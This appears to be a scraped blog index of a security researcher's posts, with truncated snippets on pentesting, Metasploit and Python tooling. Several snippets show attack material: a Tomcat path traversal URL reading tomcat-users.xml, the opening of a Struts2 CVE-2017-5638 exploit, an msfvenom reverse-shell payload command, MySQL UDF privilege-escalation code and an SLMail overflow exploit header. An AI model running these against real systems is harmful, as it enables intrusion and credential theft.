- 博客(341)
- 资源 (1)
- 收藏
- 关注
原创 Security Lab
Following table gives the URLs of all the vulnerable web applications,operating system installations, old software and war games [hacking] sites. TheURLs for individual applications that are part of o
2014-08-10 22:40:16 2458
转载 Exploit - Apache Tomcat Directory/Path Traversal
http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/usersPrevious URL would copy file na
2017-04-06 18:20:06 2287
原创 Exploit - RFID
RFID HackingPrepareInstall Proxmark3Check Proxmark3 / card statusCrack KeysPRNG AttackNESTED AttackDump data & Write dataPrepareInstall Proxmark3$ sudo apt-get install git build-essential libread
2017-04-01 13:24:32 2013
原创 Python - decode ip header
#!/usr/bin/python# -*- coding: utf-8 -*-from ctypes import *import socketimport structclass IP(Structure): _fields_ = [ ("ihl", c_uint8, 4), ("version", c_uint8, 4), ("to
2017-03-30 11:51:07 1592
原创 Python - NTP
In order to learn ntp protocol and protect ntp server against NTP DDOS Attack. We need a vulnable ntp server.Install a vulnerable NTP Server - NTP 4.2.6#!/bin/bashwget -c https://www.eecis.udel.edu/~nt
2017-03-28 12:41:50 1563
原创 Exploit - mysql unsha1
mysql-unsha1Authenticate against a MySQL server without knowing the cleartext password.AbstractThis PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with
2017-03-27 11:45:47 1285
原创 exploit - dahua camera backdoor
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.Exploit CodeI’ll share it later.$ python exploit_dahua.py 192.168
2017-03-17 17:13:15 10862
原创 Python - rpcinfo
In order to scan all rpc hosts in lannet and save it into the databse, we need to create a script. $ rpcinfo -p 10.94.106.24 program vers proto port 100000 4 tcp 111 rpcbind 100
2017-03-15 13:30:03 1220
原创 Compile zmap in Mac OSX
The quickest way to install zmap in Mac OSX is :$ brew install zmapBut, it may fails at sometimes. ex:$ time zmap -o icmpscan.csv --probe-module icmp_echoscan --whitelist-file=wh.txtMar 09 12:23:26.57
2017-03-09 13:34:42 988
原创 exploit - CVE-2017-5638 - Apache Struts2 S2-045
Metasploit-FrameworkExp Code#!/usr/bin/python# -*- coding: utf-8 -*-import urllib2import httplibdef exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#[email protected]
2017-03-07 17:13:45 5617 1
原创 python - weixin bot
If you are a newbee, please just run it. If you are a developer. please use it as a module.python>>> import webwxbot>>> dir(webwxbot)>>> wx = webwxbot.WEIXINBOT()>>> dir(wx)['__class__', '__delatt
2017-03-02 19:20:57 1043
转载 Burpsuite - Extension: SQLipy
Referenceshttps://github.com/codewatchorg/sqlipy/blob/master/SQLiPy.pyhttps://www.codewatch.org/blog/?p=402
2017-01-03 18:24:38 1298
原创 Burpsuite - Extension: Import Links into Sitemap
How to import Links into Sitemap ?Please select “Import Links from a file” in the right menu.Note: If the links file is too large, it may cost too much !Codefrom burp import IBurpExtenderfrom burp im
2017-01-03 15:30:41 985
原创 Burpsuite - Extension: Bulk Requests
Site Map Fetcher, This extension fetches the responses of unrequested items in the site map. When browsing a target, Burp adds to the site map any items that are inferred from actual responses. Some of
2017-01-03 11:22:27 705
原创 Burpsuite - Extension: Get All Proxied Hosts
How to get all proxied hosts from burpsuite sitemap ?from burp import IBurpExtenderfrom burp import IContextMenuFactoryfrom javax.swing import JMenuItemfrom java.util import List, ArrayListfrom java
2017-01-01 19:43:45 459
原创 Docker - Cannot connect to the Docker daemon
Start docker, and pull bkimminich/juice-shop. Console says$ docker pull bkimminich/juice-shopUsing default tag: latestWarning: failed to get default registry endpoint from daemon (Cannot connect to t
2016-12-27 18:21:33 4480
原创 Router - Netgear Remote Command Injection
DescriptionNETGEAR is aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbit
2016-12-15 14:33:27 625
原创 Android - Application Reversing
How to pwn cocon.apk ?A CTF Android apk called cocon.apk, and we need to decrypt the hash value (ctf flag). Please prepare a smartphone and install the apk file. If successful, android desktop will sho
2016-12-13 14:29:47 793
原创 Metasploit - ERROR: cannot discover where libxml2 is located on your system
metasploit-framework [rapid7-master] ->> rvm listrvm rubies=* ruby-2.3.3 [ x86_64 ]# => - current# =* - current && default# * - defaultWhen ruby is updated from ruby-2.3.1 to ruby-2.3.3. It will ma
2016-12-07 13:57:47 1560
原创 Metasploit - spawn a cmd shell into meterpreter
generate vbs payload with metasploit./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f vbs --arch x86 --platform winNo encoder or badchars specified, outpu
2016-11-01 18:45:16 1344
原创 Pentest - mysql udf privilege escalation
How to compile UDF DLL#include <stdio.h>#include <stdlib.h>enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};typedef struct st_udf_args { unsigned int arg_count; // num
2016-10-31 22:46:53 1053
原创 Python - rq / mrq / Celery
rqSimple job queues for Python http://python-rq.orgPlease read the results from redis server.mrqMr. Queue - A distributed worker task queue in Python using Redis & gevent - https://github.com/pricingas
2016-10-26 14:01:17 1830
原创 Metasploit - auxiliary/gather/censys_search
msf > use auxiliary/gather/censys_search msf > set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX msf >set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX msf >set CENSYS_DORK rapid7Certificates Sea
2016-10-25 12:04:10 1103
原创 Metasploit - auxiliary/gather/zoomeye_search
How to use ZoomEye API ?If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you.$ sudo easy_install zoomeye-SDKor$ sudo pip install git+https://github.
2016-10-19 01:08:53 435928
转载 PowerShell - PowerShell’s Security Guiding Principles
PS C:\Users\test\Desktop\PowerSploit-master\Exfiltration> Set-ExecutionPolicy DefaultExecution Policy ChangeThe execution policy helps protect you from scripts that you do not trust. Changing the exec
2016-10-15 22:03:47 741
转载 Pentest - PowerShell and Token Impersonation
This post will discuss bringing incognito-like functionality to PowerShell in the form of a new PowerShell script (Invoke-TokenManipulation), with some important differences. I’ll split this post up in
2016-10-15 17:58:34 810
原创 Metasploit - enmu_linux
enum_linux.rcrun post/linux/gather/enum_configsrun post/linux/gather/enum_protectionsrun post/linux/gather/enum_systemrun post/linux/gather/enum_xchatrun post/linux/gather/enum_networkrun post/lin
2016-10-14 13:45:00 535
原创 Python - WIFI Scan
How to find weak wireless APs with SSID:BSSID ? #!/usr/bin/python# -*- coding: utf8 -*-from access_points import get_scannerdef parse_apinfo(ap): return (ap['quality'], ap['ssid'], ap['bssid'])d
2016-10-09 10:27:42 4371 1
原创 Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
Summary A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to ret
2016-09-29 21:26:54 1443
原创 Vuln - Cisco - CVE-2016-6366
https://github.com/RiskSense-Ops/CVE-2016-6366/Exploit Cisco CVE-2016-6366msf auxiliary(snmp_login) > set PASSWORD publicPASSWORD => publicmsf auxiliary(snmp_login) > set RHOSTS 192.168.206.114RHOST
2016-09-26 16:46:57 2905
转载 Linux - How to check processor and cpu details
Processor/CPU detailsThe details about the processor that we shall be talking about include, number of cores, availability of hyper threading, architecture, cache size etc. To find these details about
2016-09-20 11:17:59 1246
原创 vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit
Deploy a vuln labPlease install docker yourself.#!/bin/bashdocker build -t sugarcrm:CVE-2016-7124 -f Dockerfile .docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124Dockerfile# docker php tag list
2016-09-15 00:07:05 1258
转载 How to scan whole Internet 3.7 billion IP addresses in few minutes?
Cyber security audit and ethical hacking training professionals normally use scanner to scans the networks. Scanning every IP address on the internet isn’t an easy job, and if you don’t have the resour
2016-09-12 18:13:49 581
原创 Linux - mipsel/mips/arm/armeb - gdb compile
If you don’t know what’s buildroot ?, please redirect to https://www.uclibc.org/How to install buildrootroot@lab:~# uname -aLinux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) i686 G
2016-08-22 17:24:32 3578
原创 Linux - mysql sql injection
select user from user where user=’ro’ ‘ot’=0;When user is root, it should query as follow:1. select user from user where user='ro' 'ot'=0;2. select user from user where 'root'='ro' 'ot'=0;3. select
2016-08-19 18:10:05 558
原创 Pentest - routersploit
$ git clone https://github.com/reverse-shell/routersploit$ sudo pip install -r requirements.txt$ python2 rsf.py ______ _ _____ _ _ _ | ___ \ | |
2016-08-16 23:21:31 2601
原创 Linux - setup a tftp server
tftp serverroot@kali:~# atftpdUsage: tftpd [options] [directory] [options] may be: -t, --tftpd-timeout <value>: number of second of inactivity before exiting -r, --retry-timeout <value>: time to
2016-08-10 12:02:28 695
原创 Linux - rpcclient
Demoroot@kali:~/reports# rpcclient -U "" 10.11.1.227Enter 's password: rpcclient $> help--------------- ---------------------- CLUSAPI clusapi_open_cluster blaclusapi_ge
2016-08-06 13:37:55 2665 1
原创 exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
https://www.exploit-db.com/exploits/638/#!/usr/bin/python# -*- encoding: utf-8 -*-import sysimport socketimport struct## OS Name: Microsoft Windows XP Professional# OS Version:
2016-07-26 22:30:52 3245
grep中文手册
2014-04-21
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人